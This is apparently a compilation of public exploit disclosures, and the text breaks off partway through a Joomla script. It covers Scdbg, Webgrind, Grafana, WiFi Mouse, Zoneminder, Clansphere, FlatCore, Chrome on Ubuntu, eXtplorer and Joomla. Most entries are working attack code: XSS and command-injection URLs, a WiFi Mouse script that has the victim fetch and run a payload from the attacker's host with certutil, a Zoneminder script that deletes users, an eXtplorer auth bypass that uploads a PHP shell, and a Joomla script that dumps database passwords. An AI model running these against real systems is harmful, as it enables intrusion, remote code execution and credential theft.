<pre><code># Exploit Title: Scdbg 1.0 - Buffer overflow DoS<br /># Discovery by: Rafael Pedrero<br /># Discovery Date: 2021-06-13<br /># Vendor Homepage: http://sandsprite.com/blogs/index.php?uid=7&pid=152<br /># Software Link : https://github.com/dzzie/VS_LIBEMU<br /># Tested Version: 1.0 - Compile date: Jun 3 2021 20:57:45<br /># Tested on: Windows 7, 10<br /><br />CVSS v3: 7.5<br />CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H<br />CWE: CWE-400<br /><br />Vulnerability description: scdbg.exe (all versions) is affected by a Denial<br />of Service vulnerability that occurs when you use the /foff parameter or<br />not with a specific shellcode causing it to shutdown. Any malware could use<br />this option to evade the scan.<br /><br />Proof of concept:<br /><br />Save this script like scdbg_crash.py and execute it: scdbg.exe -foff 1 -f<br />scdbg_crash.bin / scdbg.exe -f scdbg_crash.bin<br /><br />#!/usr/bin/env python<br /><br />crash = "\x90\xF6\x84\x01\x90\x90\x90\x90"<br />f = open ("scdbg_crash.bin", "w")<br />f.write(crash)<br />f.close()<br /><br />You can use gui_launcher.exe and check "Start offset 0x": 1 or directly<br />without check<br /><br />[image: image.png]<br /><br /></code></pre>
<pre><code># Exploit Title: Webgrind 1.1 - Reflected Cross-Site Scripting (XSS) & Remote Command Execution (RCE)<br /># Discovery by: Rafael Pedrero<br /># Discovery Date: 2022-02-13<br /># Vendor Homepage: http://github.com/jokkedk/webgrind/<br /># Software Link : http://github.com/jokkedk/webgrind/<br /># Tested Version: 1.1<br /># Tested on: Windows 10 using XAMPP<br /><br /># Vulnerability Type: Remote Command Execution (RCE)<br /><br />CVSS v3: 9.8<br />CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H<br />CWE: CWE-434<br /><br />Vulnerability description: Remote Command Execution (RCE) vulnerability in Webgrind <= 1.1 allow remote unauthenticated attackers to inject OS commands via /<webgrind_path_directory>/index.php in dataFile parameter.<br /><br />Proof of concept:<br /><br />http://localhost/tools/webgrind/index.php?dataFile=0%27%26calc.exe%26%27&showFraction=0.9&op=function_graph<br /><br />And the calc.exe opens.<br /><br />Note: 0'&calc.exe&', & char is neccesary to execute the command.<br /><br /><br /># Vulnerability Type: reflected Cross-Site Scripting (XSS)<br /><br />CVSS v3: 6.5<br />CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N<br />CWE: CWE-79<br /><br />Vulnerability description: Webgrind v1.1 and before, does not sufficiently<br />encode user-controlled inputs, resulting in a reflected Cross-Site<br />Scripting (XSS) vulnerability via the /<webgrind_path_directory>/index.php,<br />in file parameter.<br /><br />Proof of concept:<br /><br />http://localhost/webgrind/index.php?op=fileviewer&file=%3C%2Ftitle%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Ctitle%3E<br /><br />Response:<br />...<br /><title><br />webgrind - fileviewer: </title><script>alert(1);</script><title> </title><br /><script type="text/javascript" charset="utf-8"><br /><br /></code></pre>
<pre><code># Exploit Title: Grafana <=6.2.4 - HTML Injection<br /># Date: 30-06-2019<br /># Exploit Author: SimranJeet Singh<br /># Vendor Homepage: https://grafana.com/<br /># Software Link: https://grafana.com/grafana/download/6.2.4<br /># Version: 6.2.4<br /># CVE : CVE-2019-13068<br /><br />The uri "public/app/features/panel/panel_ctrl.ts" in Grafana before 6.2.5 allows HTML Injection in panel drilldown links (via the Title or url field)<br /><br />Payload used - <img src="[image_URL]"><h1>Hello</h1><br /><br />Best Regards,<br /><br />SimranJeet<br /><br /></code></pre>
<pre><code># Exploit Title: WiFi Mouse 1.8.3.2 - Remote Code Execution (RCE)<br /># Date: 13-10-2022<br /># Author: Payal<br /># Vendor Homepage: http://necta.us/<br /># Software Link: http://wifimouse.necta.us/#download<br /># Version: 1.8.3.2<br /># Tested on: Windows 10 Pro Build 21H2<br /><br /># Desktop Server software used by mobile app has PIN option which does not to prevent command input.# Connection response will be 'needpassword' which is only interpreted by mobile app and prompts for PIN input.<br />#!/usr/bin/env python3<br />from socket import socket, AF_INET, SOCK_STREAMfrom time import<br />sleepimport sysimport string<br /><br />target = socket(AF_INET, SOCK_STREAM)<br />port = 1978<br />try:<br /> rhost = sys.argv[1]<br /> lhost = sys.argv[2]<br /> payload = sys.argv[3]except:<br /> print("USAGE: python " + sys.argv[0]+ " <target-ip><br /><local-http-server-ip> <payload-name>")<br /> exit()<br /><br /><br />characters={<br /> "A":"41","B":"42","C":"43","D":"44","E":"45","F":"46","G":"47","H":"48","I":"49","J":"4a","K":"4b","L":"4c","M":"4d","N":"4e",<br /> "O":"4f","P":"50","Q":"51","R":"52","S":"53","T":"54","U":"55","V":"56","W":"57","X":"58","Y":"59","Z":"5a",<br /> "a":"61","b":"62","c":"63","d":"64","e":"65","f":"66","g":"67","h":"68","i":"69","j":"6a","k":"6b","l":"6c","m":"6d","n":"6e",<br /> "o":"6f","p":"70","q":"71","r":"72","s":"73","t":"74","u":"75","v":"76","w":"77","x":"78","y":"79","z":"7a",<br /> "1":"31","2":"32","3":"33","4":"34","5":"35","6":"36","7":"37","8":"38","9":"39","0":"30",<br /> " ":"20","+":"2b","=":"3d","/":"2f","_":"5f","<":"3c",<br /> ">":"3e","[":"5b","]":"5d","!":"21","@":"40","#":"23","$":"24","%":"25","^":"5e","&":"26","*":"2a",<br /> "(":"28",")":"29","-":"2d","'":"27",'"':"22",":":"3a",";":"3b","?":"3f","`":"60","~":"7e",<br /> "\\":"5c","|":"7c","{":"7b","}":"7d",",":"2c",".":"2e"}<br /><br />def openCMD():<br /> target.sendto(bytes.fromhex("6f70656e66696c65202f432f57696e646f77732f53797374656d33322f636d642e6578650a"),<br />(rhost,port)) # openfile /C/Windows/System32/cmd.exe<br />def SendString(string):<br /> for char in string:<br /> target.sendto(bytes.fromhex("7574663820" + characters[char] +<br />"0a"),(rhost,port)) # Sends Character hex with packet padding<br /> sleep(0.03)<br />def SendReturn():<br /> target.sendto(bytes.fromhex("6b657920203352544e"),(rhost,port)) #<br />'key 3RTN' - Similar to 'Remote Mouse' mobile app<br /> sleep(0.5)<br />def exploit():<br /> print("[+] 3..2..1..")<br /> sleep(2)<br /> openCMD()<br /> print("[+] *Super fast hacker typing*")<br /> sleep(1)<br /> SendString("certutil.exe -urlcache -f http://" + lhost + "/" +<br />payload + " C:\\Windows\\Temp\\" + payload)<br /> SendReturn()<br /> print("[+] Retrieving payload")<br /> sleep(3)<br /> SendString("C:\\Windows\\Temp\\" + payload)<br /> SendReturn()<br /> print("[+] Done! Check Your Listener?")<br /><br />def main():<br /> target.connect((rhost,port))<br /> exploit()<br /> target.close()<br /> exit()<br />if __name__=="__main__":<br /> main()<br /> <br /><br /></code></pre>
<pre><code># Exploit Title: Zoneminder v1.36.26 - Log Injection -> CSRF Bypass -> Stored Cross-Site Scripting (XSS)<br /># Date: 10/01/2022<br /># Exploit Author: Trenches of IT<br /># Vendor Homepage: https://github.com/ZoneMinder/zoneminder<br /># Version: v1.36.26<br /># Tested on: Linux/Windows<br /># CVE: CVE-2022-39285, CVE-2022-39290, CVE-2022-39291 <br /># Writeup: https://www.trenchesofit.com/2022/09/30/zoneminder-web-app-testing/<br />#<br /># Proof of Concept:<br /># 1 - The PoC injects a XSS payload with the CSRF bypass into logs. (This action will repeat every second until manually stopped)<br /># 2 - Admin user logs navigates to http://<target>/zm/index.php?view=log<br /># 3 - XSS executes delete function on target UID (user).<br /><br />import requests<br />import re<br />import time<br />import argparse<br />import sys<br /><br />def getOptions(args=sys.argv[1:]):<br /> parser = argparse.ArgumentParser(description="Trenches of IT Zoneminder Exploit PoC", epilog="Example: poc.py -i 1.2.3.4 -p 80 -u lowpriv -p lowpriv -d 1")<br /> parser.add_argument("-i", "--ip", help="Provide the IP or hostname of the target zoneminder server. (Example: -i 1.2.3.4", required=True)<br /> parser.add_argument("-p", "--port", help="Provide the port of the target zoneminder server. (Example: -p 80", required=True)<br /> parser.add_argument("-zU", "--username", help="Provide the low privileged username for the target zoneminder server. (Example: -zU lowpriv", required=True)<br /> parser.add_argument("-zP", "--password", help="Provide the low privileged password for the target zoneminder server. (Example: -zP lowpriv", required=True)<br /> parser.add_argument("-d", "--deleteUser", help="Provide the target user UID to delete from the target zoneminder server. (Example: -d 7", required=True)<br /> options = parser.parse_args(args)<br /> return options<br /><br />options = getOptions(sys.argv[1:])<br /><br />payload = "http%3A%2F%2F" + options.ip + "%2Fzm%2F</td></tr><script src='/zm/index.php?view=options&tab=users&action=delete&markUids[]=" + options.deleteUser + "&deleteBtn=Delete'</script>"<br /><br />#Request to login and get the response headers<br />loginUrl = "http://" + options.ip + ":" + options.port + "/zm/index.php?action=login&view=login&username="+options.username+"&password="+options.password<br />loginCookies = {"zmSkin": "classic", "zmCSS": "base", "zmLogsTable.bs.table.pageNumber": "1", "zmEventsTable.bs.table.columns": "%5B%22Id%22%2C%22Name%22%2C%22Monitor%22%2C%22Cause%22%2C%22StartDateTime%22%2C%22EndDateTime%22%2C%22Length%22%2C%22Frames%22%2C%22AlarmFrames%22%2C%22TotScore%22%2C%22AvgScore%22%2C%22MaxScore%22%2C%22Storage%22%2C%22DiskSpace%22%2C%22Thumbnail%22%5D", "zmEventsTable.bs.table.searchText": "", "zmEventsTable.bs.table.pageNumber": "1", "zmBandwidth": "high", "zmHeaderFlip": "up", "ZMSESSID": "f1neru6bq6bfddl7snpjqo6ss2"}<br />loginHeaders = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://"+options.ip, "Connection": "close", "Referer": "http://"+options.ip+"/zm/index.php?view=login", "Upgrade-Insecure-Requests": "1"}<br />response = requests.post(loginUrl, headers=loginHeaders, cookies=loginCookies)<br />zmHeaders = response.headers<br />try:<br /> zoneminderSession = re.findall(r'ZMSESSID\=\w+\;', str(zmHeaders))<br /> finalSession = zoneminderSession[-1].replace('ZMSESSID=', '').strip(';')<br />except:<br /> print("[ERROR] Ensure the provided username and password is correct.")<br /> sys.exit(1)<br />print("Collected the low privilege user session token: "+finalSession)<br /><br />#Request using response headers to obtain CSRF value<br />csrfUrl = "http://"+options.ip+":"+options.port+"/zm/index.php?view=filter"<br />csrfCookies = {"zmSkin": "classic", "zmCSS": "base", "zmLogsTable.bs.table.pageNumber": "1", "zmEventsTable.bs.table.columns": "%5B%22Id%22%2C%22Name%22%2C%22Monitor%22%2C%22Cause%22%2C%22StartDateTime%22%2C%22EndDateTime%22%2C%22Length%22%2C%22Frames%22%2C%22AlarmFrames%22%2C%22TotScore%22%2C%22AvgScore%22%2C%22MaxScore%22%2C%22Storage%22%2C%22DiskSpace%22%2C%22Thumbnail%22%5D", "zmEventsTable.bs.table.searchText": "", "zmEventsTable.bs.table.pageNumber": "1", "zmBandwidth": "high", "zmHeaderFlip": "up", "ZMSESSID": '"' + finalSession + '"'}<br />csrfHeaders = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Referer": "http://"+options.ip+"/zm/index.php?view=montagereview&fit=1&minTime=2022-09-30T20:52:58&maxTime=2022-09-30T21:22:58&current=2022-09-30%2021:07:58&displayinterval=1000&live=0&scale=1&speed=1", "Upgrade-Insecure-Requests": "1"}<br />response = requests.get(csrfUrl, headers=csrfHeaders, cookies=csrfCookies)<br />zmBody = response.text<br />extractedCsrfKey = re.findall(r'csrfMagicToken\s\=\s\"key\:\w+\,\d+', str(zmBody))<br />finalCsrfKey = extractedCsrfKey[0].replace('csrfMagicToken = "', '')<br />print("Collected the CSRF key for the log injection request: "+finalCsrfKey)<br />print("Navigate here with an admin user: http://"+options.ip+"/zm/index.php?view=log")<br /><br />while True:<br /> <br /> #XSS Request<br /> xssUrl = "http://"+options.ip+"/zm/index.php"<br /> xssCookies = {"zmSkin": "classic", "zmCSS": "base", "zmLogsTable.bs.table.pageNumber": "1", "zmEventsTable.bs.table.columns": "%5B%22Id%22%2C%22Name%22%2C%22Monitor%22%2C%22Cause%22%2C%22StartDateTime%22%2C%22EndDateTime%22%2C%22Length%22%2C%22Frames%22%2C%22AlarmFrames%22%2C%22TotScore%22%2C%22AvgScore%22%2C%22MaxScore%22%2C%22Storage%22%2C%22DiskSpace%22%2C%22Thumbnail%22%5D", "zmEventsTable.bs.table.searchText": "", "zmEventsTable.bs.table.pageNumber": "1", "zmBandwidth": "high", "zmHeaderFlip": "up", "ZMSESSID": finalSession}<br /> xssHeaders = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0", "Accept": "application/json, text/javascript, */*; q=0.01", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "X-Requested-With": "XMLHttpRequest", "Origin": "http://"+options.ip, "Connection": "close", "Referer": "http://"+options.ip+"/zm/index.php?view=filter"}<br /> xssData = {"__csrf_magic": finalCsrfKey , "view": "request", "request": "log", "task": "create", "level": "ERR", "message": "Trenches%20of%20IT%20PoC", "browser[name]": "Firefox", "browser[version]": "91.0", "browser[platform]": "UNIX", "file": payload, "line": "105"} <br /> response = requests.post(xssUrl, headers=xssHeaders, cookies=xssCookies, data=xssData)<br /> print("Injecting payload: " + response.text)<br /><br /> time.sleep(1)<br /> <br /><br /></code></pre>
<pre><code># Exploit Title: Clansphere CMS 2011.4 - Stored Cross-Site Scripting (XSS)<br /># Exploit Author: Sinem Şahin<br /># Date: 2022-10-08<br /># Vendor Homepage: https://www.csphere.eu/<br /># Version: 2011.4<br /># Tested on: Windows & XAMPP<br /><br />==> Tutorial <==<br /><br />1- Go to the following url. => http://(HOST)/index.php?mod=buddys&action=create&id=925872<br />2- Write XSS Payload into the username of the buddy list create.<br />3- Press "Save" button.<br /><br />XSS Payload ==> "<script>alert("usernameXSS")</script> <br /><br />Link: https://github.com/sinemsahn/POC/blob/main/Create%20Clansphere%202011.4%20%22username%22%20xss.md<br /><br /></code></pre>
<pre><code># Exploit Title: FlatCore CMS 2.1.1 -Stored Cross Site Scripting<br /># Date: 2020-09-24<br /># Exploit Author: Sinem Şahin<br /># Vendor Homepage: https://flatcore.org/<br /># Version: 2.1.1<br /># Tested on: Windows & XAMPP<br /><br />==> Tutorial <==<br /><br />1- Go to the following url. => http://(HOST)/install/index.php<br />2- Write XSS Payload into the username of the user account.<br />3- Press "Save" button.<br /><br />XSS Payload ==> "<script>alert("usernameXSS")</script><br /><br /></code></pre>
<pre><code>#Vulnerability: Google Chrome code execution via missing lib file (Ubuntu)<br />Product: Google Chrome<br />Discovered by: Rafay Baloch and Muhammad Samak<br />#Version: 109.0.5414.74<br />#Impact: Moderate<br />#Company: Cyber Citadel<br />#Website: https://www.cybercitadel.com<br />#Tested-on : Ubuntu 22.04.1<br /><br />*Description*<br /><br />Google chrome attempts to load the 'libssckbi.so' file from a user-writable location.<br />PATH: /home/$username/.pki/nssdb/libnssckbi.so<br />Since the Shared Library 'ibnssckbi.so' specified path is writeable.<br />It is possible to achieve the Code Execution by placing the malicious file with <br />the name `libnssckbi.so` in the specified path.<br /><br /><br /><br />*exploit*<br /><br />Following is the POC that could be used to reproduce the issue:<br /><br />echo "\n\t\t\tGoogle-Chrome Shared Library Code Execution..."<br />echo "[*] Checking /.pki/nssdb PATH"<br />if [ -d "/home/haalim/.pki/nssdb" ]<br />then<br /><br /> echo "[+] Directory Exists..."<br /> if [ -w "/home/haalim/.pki/nssdb" ]<br /> then<br /> echo "[+] Directory is writable..."<br /><br /> echo "[+] Directory is writable..."<br /> echo "[+] Generating malicious File libnssckbi.so ..."<br /> echo "#define _GNU_SOURCE" > /home/haalim/.pki/nssdb/exploit.c<br /> echo "#include <unistd.h>" >> /home/haalim/.pki/nssdb/exploit.c<br /> echo "#include <stdio.h>" >> /home/haalim/.pki/nssdb/exploit.c<br /> echo "#include <stdlib.h>" >> /home/haalim/.pki/nssdb/exploit.c<br /> echo "void f() {" >> /home/haalim/.pki/nssdb/exploit.c<br /> echo 'printf("Code Executed............ TMGM :)\n");' >> /home/haalim/.pki/nssdb/exploit.c<br /> echo "}" >> /home/haalim/.pki/nssdb/exploit.c<br /> gcc -c -Wall -Werror -fpic /home/haalim/.pki/nssdb/exploit.c -o /home/haalim/.pki/nssdb/exploit.o <br /> gcc -shared -o /home/haalim/.pki/nssdb/libnssckbi.so -Wl,-init,f /home/haalim/.pki/nssdb/exploit.o <br /><br /><br /> fi<br /><br />fi<br /><br />Upon closing the browser windows, the application executes the malicious code<br /><br /><br />*Impact*<br /><br />The attacker can use this behavior to bypass the application whitelisting rules.<br />This behavior can also lead to DoS attacks.<br />An attacker can trick a victim into supplying credentials by creating a fake prompt.<br /></code></pre>
<pre><code># Exploit Title: eXtplorer<= 2.1.14 - Authentication Bypass & Remote Code Execution (RCE)<br /># Exploit Author: ErPaciocco<br /># Author Website: https://erpaciocco.github.io<br /># Vendor Homepage: https://extplorer.net/<br />#<br /># Vendor:<br /># ==============<br /># extplorer.net<br />#<br /># Product:<br /># ==================<br /># eXtplorer <= v2.1.14<br />#<br /># eXtplorer is a PHP and Javascript-based File Manager, it allows to browse<br /># directories, edit, copy, move, delete,<br /># search, upload and download files, create & extract archives, create new<br /># files and directories, change file<br /># permissions (chmod) and more. It is often used as FTP extension for popular<br /># applications like Joomla.<br />#<br /># Vulnerability Type:<br /># ======================<br /># Authentication Bypass (& Remote Command Execution)<br />#<br />#<br /># Vulnerability Details:<br /># =====================<br />#<br /># eXtplorer authentication mechanism allows an attacker<br /># to login into the Admin Panel without knowing the password<br /># of the victim, but only its username. This vector is exploited<br /># by not supplying password in POST request.<br />#<br />#<br /># Tested on Windows<br /># <br />#<br /># Reproduction steps:<br /># ==================<br />#<br /># 1) Navigate to Login Panel<br /># 2) Intercept authentication POST request to /index.php<br /># 3) Remove 'password' field<br /># 4) Send it and enjoy!<br />#<br />#<br /># Exploit code(s):<br /># ===============<br />#<br /># Run below PY script from CLI...<br />#<br /># [eXtplorer_auth_bypass.py]<br />#<br /><br /># Proof Of Concept<br /><br />try:<br /> import requests<br />except:<br /> print(f"ERROR: RUN: pip install requests")<br /> exit()<br />import sys<br />import time<br />import urllib.parse<br />import re<br />import random<br />import string<br />import socket<br />import time<br />import base64<br /><br />TARGET = None<br />WORDLIST = None<br /><br />_BUILTIN_WL = [<br /> 'root',<br /> 'admin',<br /> 'test',<br /> 'guest',<br /> 'info',<br /> 'adm',<br /> 'user',<br /> 'administrator'<br /> ]<br /><br />_HOST = None<br />_PATH = None<br />_SESSION = None<br />_HEADERS = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0',<br /> 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',<br /> 'Accept-Language': 'it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3',<br /> 'Accept-Encoding': 'gzip, deflate, br',<br /> 'Connection': 'keep-alive' }<br /><br />def detect():<br /> global _HOST<br /> global _PATH<br /> global _SESSION<br /> global _HEADERS<br /> <br /> _HOST = TARGET[0].split(':')[0] + '://' + TARGET[0].split('/')[2]<br /> _PATH = '/'.join(TARGET[0].split('/')[3:]).rstrip('/')<br /> <br /><br /> <br /> _SESSION = requests.Session()<br /><br /> raw = _SESSION.get(f"{_HOST}/{_PATH}/extplorer.xml", headers=_HEADERS, verify=False)<br /><br /> if raw.status_code == 200:<br /> ver = re.findall("<version>(((\d+)\.?)+)<\/version>", raw.text, re.MULTILINE)<br /> <br /> if int(ver[0][2]) < 15:<br /> return True<br /><br /> return False<br /> <br /><br />def auth_bypass():<br /> global _HOST<br /> global _PATH<br /> global _SESSION<br /> global _HEADERS<br /><br /> global WORDLIST<br /> global _BUILTIN_WL<br /> <br /> _HEADERS['X-Requested-With'] = 'XMLHttpRequest'<br /> <br /> params = {'option': 'com_extplorer',<br /> 'action': 'login',<br /> 'type': 'extplorer',<br /> 'username': 'admin',<br /> 'lang':'english'}<br /><br /> if WORDLIST != None:<br /> if WORDLIST == _BUILTIN_WL:<br /> info(f"Attempting to guess an username from builtin wordlist")<br /> wl = _BUILTIN_WL<br /> else:<br /> info(f"Attempting to guess an username from wordlist: {WORDLIST[0]}")<br /> with open(WORDLIST[0], "r") as f:<br /> wl = f.read().split('\n')<br /> for user in wl:<br /> params = {'option': 'com_extplorer',<br /> 'action': 'login',<br /> 'type': 'extplorer',<br /> 'username': user,<br /> 'lang':'english'}<br /><br /> info(f"Trying with {user}")<br /> <br /> res = _SESSION.post(f"{_HOST}/{_PATH}/index.php", data=params, headers=_HEADERS, verify=False)<br /> if "successful" in res.text:<br /> return (user)<br /> else:<br /> res = _SESSION.post(f"{_HOST}/{_PATH}/index.php", data=params, headers=_HEADERS, verify=False)<br /><br /> if "successful" in res.text:<br /> return ('admin')<br /><br /> return False<br /><br />def rce():<br /> global _HOST<br /> global _PATH<br /> global _SESSION<br /> global _HEADERS<br /> global _PAYLOAD<br /> <br /> tokenReq = _SESSION.get(f"{_HOST}/{_PATH}/index.php?option=com_extplorer&action=include_javascript&file=functions.js")<br /> token = re.findall("token:\s\"([a-f0-9]{32})\"", tokenReq.text)[0]<br /><br /> info(f"CSRF Token obtained: {token}")<br /><br /> payload = editPayload()<br /><br /> info(f"Payload edited to fit local parameters")<br /><br /><br /> params = {'option': 'com_extplorer',<br /> 'action': 'upload',<br /> 'dir': f"./{_PATH}",<br /> 'requestType': 'xmlhttprequest',<br /> 'confirm':'true',<br /> 'token': token}<br /> name = ''.join(random.choices(string.ascii_uppercase + string.digits, k=6))<br /> files = {'userfile[0]':(f"{name}.php", payload)}<br /> <br /> req = _SESSION.post(f"{_HOST}/{_PATH}/index.php", data=params, files=files, verify=False)<br /><br /> if "successful" in req.text:<br /> info(f"File {name}.php uploaded in root dir")<br /> info(f"Now set a (metasploit) listener and go to: {_HOST}/{_PATH}/{name}.php")<br /><br />def attack():<br /> if not TARGET:<br /> error("TARGET needed")<br /><br /> if TARGET:<br /> if not detect():<br /> error("eXtplorer vulnerable instance not found!")<br /> exit(1)<br /> else:<br /> info("eXtplorer endpoint is vulnerable!")<br /> username = auth_bypass()<br /> if username:<br /> info("Auth bypassed!")<br /> rce()<br /> else:<br /> error("Username 'admin' not found")<br /><br />def error(message):<br /> print(f"[E] {message}")<br /><br />def info(message):<br /> print(f"[I] {message}")<br /><br />def editPayload():<br /> # You can generate payload with msfvenom and paste below base64 encoded result<br /> # msfvenom -p php/meterpreter_reverse_tcp LHOST=<yourIP> LPORT=<yourPORT> -f base64<br /> return base64.b64decode("PD9waHAgZWNobyAiSEFDS0VEISI7ICA/Pg==")<br /><br />def help():<br /> print(r"""eXtplorer <= 2.1.14 exploit - Authentication Bypass & Remote Code Execution<br /><br />Usage:<br /> python3 eXtplorer_auth_bypass.py -t <target-host> [-w <userlist>] [-wb]<br /><br />Options:<br /> -t Target host. Provide target IP address (and optionally port).<br /> -w Wordlist for user enumeration and authentication (Optional)<br /> -wb Use built-in wordlist for user enumeration (Optional)<br /> -h Show this help menu.<br />""")<br /> return True<br /><br />args = {"t" : (1, lambda *x: (globals().update(TARGET = x[0]))),<br /> "w" : (1, lambda *x: (globals().update(WORDLIST = x[0]))),<br /> "wb": (0, lambda *x: (globals().update(WORDLIST = _BUILTIN_WL))),<br /> "h" : (0, lambda *x: (help() and exit(0)))}<br /><br />if __name__ == "__main__":<br /> i = 1<br /> [<br /> args[ arg[1:]][1](sys.argv[i+1: (i:=i+1+args[arg[1:]][0]) ])<br /> for arg in [k<br /> for k in sys.argv[i:]<br /> ]<br /> if arg[0] == '-'<br /> ]<br /> attack()<br />else:<br /> help()<br /> <br /><br /># ///////////////////////////////////////////////////////////////////////<br /><br /># [Script examples]<br />#<br />#<br /># c:\>python eXtplorer_auth_bypass.py -t https://target.com<br /># c:\>python eXtplorer_auth_bypass.py -t http://target.com:1234 -w wordlist.txt<br /># c:\>python eXtplorer_auth_bypass.py -t http://target.com -wb<br /><br /># Exploitation Method:<br /># ======================<br /># Remote<br /><br /># [+] Disclaimer<br /># The information contained within this advisory is supplied "as-is" with no<br /># warranties or guarantees of fitness of use or otherwise.<br /># Permission is hereby granted for the redistribution of this advisory,<br /># provided that it is not altered except by reformatting it, and<br /># that due credit is given. Permission is explicitly given for insertion in<br /># vulnerability databases and similar, provided that due credit<br /># is given to the author. The author is not responsible for any misuse of the<br /># information contained herein and accepts no responsibility<br /># for any damage caused by the use or misuse of this information.<br /><br /></code></pre>
<pre><code>#!/usr/bin/env ruby<br /><br /># Exploit<br />## Title: Joomla! < 4.2.8 - Unauthenticated information disclosure<br />## Exploit author: noraj (Alexandre ZANNI) for ACCEIS (https://www.acceis.fr)<br />## Author website: https://pwn.by/noraj/<br />## Exploit source: https://github.com/Acceis/exploit-CVE-2023-23752<br />## Date: 2023-03-24<br />## Vendor Homepage: https://www.joomla.org/<br />## Software Link: https://downloads.joomla.org/cms/joomla4/4-2-7/Joomla_4-2-7-Stable-Full_Package.tar.gz?format=gz<br />## Version: 4.0.0 < 4.2.8 (it means from 4.0.0 up to 4.2.7)<br />## Tested on: Joomla! Version 4.2.7<br />## CVE : CVE-2023-23752<br /><br /># Vulnerability<br />## Discoverer: Zewei Zhang from NSFOCUS TIANJI Lab<br />## Date: 2023-02-24<br />## Discoverer website: https://nsfocusglobal.com/company-overview/nsfocus-security-labs/<br />## Title: Joomla Unauthorized Access<br />## CVE: CVE-2023-23752<br />## Patch: Update to >= 4.2.8<br />## References:<br />## - https://nsfocusglobal.com/joomla-unauthorized-access-vulnerability-cve-2023-23752-notice/<br />## - https://developer.joomla.org/security-centre/894-20230201-core-improper-access-check-in-webservice-endpoints.html<br />## - https://attackerkb.com/topics/18qrh3PXIX/cve-2023-23752<br />## - https://nvd.nist.gov/vuln/detail/CVE-2023-23752<br />## - https://vulncheck.com/blog/joomla-for-rce<br />## - https://github.com/projectdiscovery/nuclei-templates/blob/main/cves/2023/CVE-2023-23752.yaml<br /><br /># standard library<br />require 'json'<br /># gems<br />require 'httpx'<br />require 'docopt'<br />require 'paint'<br /><br />doc = <<~DOCOPT<br /> #{Paint['Joomla! < 4.2.8 - Unauthenticated information disclosure', :bold]}<br /><br /> #{Paint['Usage:', :red]}<br /> #{__FILE__} <url> [options]<br /> #{__FILE__} -h | --help<br /><br /> #{Paint['Parameters:', :red]}<br /> <url> Root URL (base path) including HTTP scheme, port and root folder<br /><br /> #{Paint['Options:', :red]}<br /> --debug Display arguments<br /> --no-color Disable colorized output (NO_COLOR environment variable is respected too)<br /> -h, --help Show this screen<br /><br /> #{Paint['Examples:', :red]}<br /> #{__FILE__} http://127.0.0.1:4242<br /> #{__FILE__} https://example.org/subdir<br /><br /> #{Paint['Project:', :red]}<br /> #{Paint['author', :underline]} (https://pwn.by/noraj / https://twitter.com/noraj_rawsec)<br /> #{Paint['company', :underline]} (https://www.acceis.fr / https://twitter.com/acceis)<br /> #{Paint['source', :underline]} (https://github.com/Acceis/exploit-CVE-2023-23752)<br />DOCOPT<br /><br />def fetch_users(root_url, http)<br /> vuln_url = "#{root_url}/api/index.php/v1/users?public=true"<br /> http.get(vuln_url)<br />end<br /><br />def parse_users(root_url, http)<br /> data_json = fetch_users(root_url, http)<br /> data = JSON.parse(data_json)['data']<br /> users = []<br /> data.each do |user|<br /> if user['type'] == 'users'<br /> id = user['attributes']['id']<br /> name = user['attributes']['name']<br /> username = user['attributes']['username']<br /> email = user['attributes']['email']<br /> groups = user['attributes']['group_names']<br /> users << {id: id, name: name, username: username, email: email, groups: groups}<br /> end<br /> end<br /> users<br />end<br /><br />def display_users(root_url, http)<br /> users = parse_users(root_url, http)<br /> puts Paint['Users', :red, :bold]<br /> users.each do |u|<br /> puts "[#{u[:id]}] #{u[:name]} (#{Paint[u[:username], :yellow]}) - #{u[:email]} - #{u[:groups]}"<br /> end<br />end<br /><br />def fetch_config(root_url, http)<br /> vuln_url = "#{root_url}/api/index.php/v1/config/application?public=true"<br /> http.get(vuln_url)<br />end<br /><br />def parse_config(root_url, http)<br /> data_json = fetch_config(root_url, http)<br /> data = JSON.parse(data_json)['data']<br /> config = {}<br /> data.each do |entry|<br /> if entry['type'] == 'application'<br /> key = entry['attributes'].keys.first<br /> config[key] = entry['attributes'][key]<br /> end<br /> end<br /> config<br />end<br /><br />def display_config(root_url, http)<br /> c = parse_config(root_url, http)<br /> puts Paint['Site info', :red, :bold]<br /> puts "Site name: #{c['sitename']}"<br /> puts "Editor: #{c['editor']}"<br /> puts "Captcha: #{c['captcha']}"<br /> puts "Access: #{c['access']}"<br /> puts "Debug status: #{c['debug']}"<br /> puts<br /> puts Paint['Database info', :red, :bold]<br /> puts "DB type: #{c['dbtype']}"<br /> puts "DB host: #{c['host']}"<br /> puts "DB user: #{Paint[c['user'], :yellow, :bold]}"<br /> puts "DB password: #{Paint[c['password'], :yellow, :bold]}"<br /> puts "DB name: #{c['db']}"<br /> puts "DB prefix: #{c['dbprefix']}"<br /> puts "DB encryption #{c['dbencryption']}"<br />end<br /><br />begin<br /> args = Docopt.docopt(doc)<br /> Paint.mode = 0 if args['--no-color']<br /> puts args if args['--debug']<br /><br /> http = HTTPX<br /> display_users(args['<url>'], http)<br /> puts<br /> display_config(args['<url>'], 